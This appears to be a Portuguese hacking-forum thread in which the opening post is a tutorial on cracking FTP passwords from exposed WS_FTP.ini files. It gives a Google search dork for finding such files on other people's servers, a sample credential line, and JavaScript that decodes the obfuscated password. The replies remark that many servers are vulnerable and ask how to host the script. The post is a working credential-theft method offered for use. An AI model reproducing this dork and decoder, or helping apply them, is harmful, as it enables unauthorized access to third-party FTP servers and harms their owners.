Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Quebrando senhas WS_FTP.ini

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Quebrando senhas WS_FTP.ini

    Bom eu sei que essa tecnica e antiga mais resolvi postar =)



    Quebrando senhas de ftp "basico")

    procurar no google
    allinurl: WS_FTP.ini

    ai vai ter algo mais ou menos assim
    uid=teste
    PWD=V018D749F57CCA377B9A32014BB75A87877A49B6AA49A

    copie o "PWD=V018D749F57CCA377B9A32014BB75A87877A49B6AA49A "
    upe o arquivo abaixo em algum host
    e a senha estara quebrada =)
    Código:
    <script language="Javascript" type="text/javascript">
    <!--
    
    function wsFTP_decoder(myString) {
    if (myString.indexOf('PWD=', 0) == -1 || myString.length-37<0)
    	{
    	alert("ENTRY NOT VALID: be sure to enter the whole line, including 'PWD='");
    	}
    	else
    	{
    	myPassword=myString.substring(37,myString.length);
    
    	var x= "";
    	
    	for (var i = 0; i<myPassword.length/2; i++)
    		{
    			document.forms[0].decoded_entry.value = "";
    
    			var myCharacter=myPassword.substring(i*2,i*2+2);
    			var myParsed=myString.substring(5+i,6+i);
    			var myClearText=parseInt("0x"+myCharacter) -i -1 -((47+parseInt("0x"+myParsed))%57);
    			x = x+String.fromCharCode(myClearText);
    
    			document.forms[0].decoded_entry.value = x;
    		}
    	}
    }
    // -->
    </script>
    -------------------------------------------------------------------------------------------







  • Font Size
    #2
    pior que tem uns quantos servidores que tem esse falha ai.
    Não Acha Estranha Essa Frase:
    Eu Sou Hacker e Uso Windows XP!

    Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


    Fã ->Nickguitar.dll


    Quer ajudar nossso fórum e não sabe como?
    Então click na imagem e ajude-nos com os links off

    Comment


    • Font Size
      #3
      Esse Script hospedo como .. .jr ? .html ?
      A senha do FTP vai onde
      PWD=V018D749F57CCA377B9A32014BB75A87877A49B6AA49A

      Ae --->> alert("ENTRY NOT VALID: be sure to enter the whole line, including 'PWD=V018D749F57CCA377B9A32014BB75A87877A49B6AA49A ");

      Comment

      X
      Working...
      X